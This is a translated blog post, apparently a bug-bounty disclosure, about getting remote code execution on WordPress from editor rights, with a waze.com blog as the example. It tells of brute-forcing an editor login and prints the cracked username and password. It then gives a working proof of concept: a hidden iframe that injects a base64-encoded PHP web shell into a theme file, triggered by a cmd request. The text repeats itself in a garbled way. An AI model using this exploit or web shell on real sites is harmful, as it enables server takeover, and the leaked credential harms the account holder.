WordPress: unsafe out of the box - we get RCE with editor rights. And more about Google, a startup and 1 billion dollars
Everyone enjoy reading. I want to talk about an insecure feature in the world-famous blog engine - WordPress, which has been present in it for a long time. Many people know about it (including this opportunity is recognized as “legitimate” by the developers themselves), but I’m not sure if someone described its use exactly in the article we offer in the attack vector (I personally could not find it).
Many companies such as Microsoft, Nokia, Google use WordPress. The administrators of blogs issue the rights of editors to their PR services ... And here is the main point - in WordPress only two roles have the right to use javascript inside posts - administrators and editors.
The whole idea in one sentence: create a post containing malicious JS. If the administrator opens our post - we get Remote Command Execution.
A few days ago I had time and desire to dig some Google site. The startup was taken for the purpose - waze.com, bought by Google for $ 1 billion. Immediately WordPress was found, and I decided to sort out users' passwords on a rather small base - rockyou-75.txt . On waking in the morning I saw the coveted:
')
Bingo! Found a password from the user, with the rights of the editor. Of course, I immediately wanted to get RCE on the server. But ... known methods say that you need to have the rights of the administrator of the blog. Then the shell can be poured through:
We can do the same actions through js. Create a post under the editor, in which we open the hidden iframe, and perform the necessary actions in it. If the post opens admin - we get RCE.
PoC exploit:
Line by line:
We can also perform any actions under the administrator, for example:
So, using the PoC code above, we will inject the backdoor into the twentythirteen theme template on page 404, as soon as any authorized admin opens our post. This applies to latest WordPress version - 3.6.1
After the introduction of the back-end, RCE will be available on the following request:
In the case of Google, I did not embed the code above, but simply recorded the video, how can I get RCE. They immediately removed WordPress and moved to blogger.com. Correct solution. I also found other bugs, but did not receive the money, as the resource is in the blackout period (6 months after purchase). But added to the hall of fame :-)
Demo (which was sent to Google):
Many companies such as Microsoft, Nokia, Google use WordPress. The administrators of blogs issue the rights of editors to their PR services ... And here is the main point - in WordPress only two roles have the right to use javascript inside posts - administrators and editors.
The whole idea in one sentence: create a post containing malicious JS. If the administrator opens our post - we get Remote Command Execution.
A few days ago I had time and desire to dig some Google site. The startup was taken for the purpose - waze.com, bought by Google for $ 1 billion. Immediately WordPress was found, and I decided to sort out users' passwords on a rather small base - rockyou-75.txt . On waking in the morning I saw the coveted:
[+] Starting the password brute forcer [SUCCESS] Login: di-ann Password: illuminati + ---- + -------- + ------ + ------------ + | Id | Login | Name | Password | + ---- + -------- + ------ + ------------ + | | di-ann | | illuminati | + ---- + -------- + ------ + ------------ + [+] Finished at Sat Sep 7 09:47:27 2013 [+] Elapsed time: 00:42:52 Exiting!
')
Bingo! Found a password from the user, with the rights of the editor. Of course, I immediately wanted to get RCE on the server. But ... known methods say that you need to have the rights of the administrator of the blog. Then the shell can be poured through:
- Editing topics and implementing your PHP code;
- Filling your module with malicious code.
We can do the same actions through js. Create a post under the editor, in which we open the hidden iframe, and perform the necessary actions in it. If the post opens admin - we get RCE.
PoC exploit:
<iframe name='evilframe' src='/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentythirteen' style='display:none' onload="if (evilframe.document.getElementById('newcontent').value.indexOf('system') == -1) {evilframe.document.getElementById('newcontent').value += atob('PD9waHAgQHN5c3RlbSgkX0dFVFsnY21kJ10pOyA/Pg=='); evilframe.document.getElementById('submit').click();}"></iframe> Line by line:
iframe name='evilframe' src='/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentythirteen' // iframe 404 (twentythirteen) style='display:none' // iframe onload= // if (evilframe.document.getElementById('newcontent').value.indexOf('system') == -1) // , backdoor ( system) evilframe.document.getElementById('newcontent').value += atob('PD9waHAgQHN5c3RlbSgkX0dFVFsnY21kJ10pOyA/Pg=='// <?php @system($_GET['cmd']); ?> evilframe.document.getElementById('submit').click() // We can also perform any actions under the administrator, for example:
- Create a new user with administrator rights;
- Change the admin password (because WordPress does not require the old password when changing it);
- Change the password to any user;
- And any other actions available only to the admin.
So, using the PoC code above, we will inject the backdoor into the twentythirteen theme template on page 404, as soon as any authorized admin opens our post. This applies to latest WordPress version - 3.6.1
After the introduction of the back-end, RCE will be available on the following request:
http: // localhost / wordpress /? p = 123123123 & cmd = id
In the case of Google, I did not embed the code above, but simply recorded the video, how can I get RCE. They immediately removed WordPress and moved to blogger.com. Correct solution. I also found other bugs, but did not receive the money, as the resource is in the blackout period (6 months after purchase). But added to the hall of fame :-)
Demo (which was sent to Google):
Source: https://habr.com/ru/post/194282/
All Articles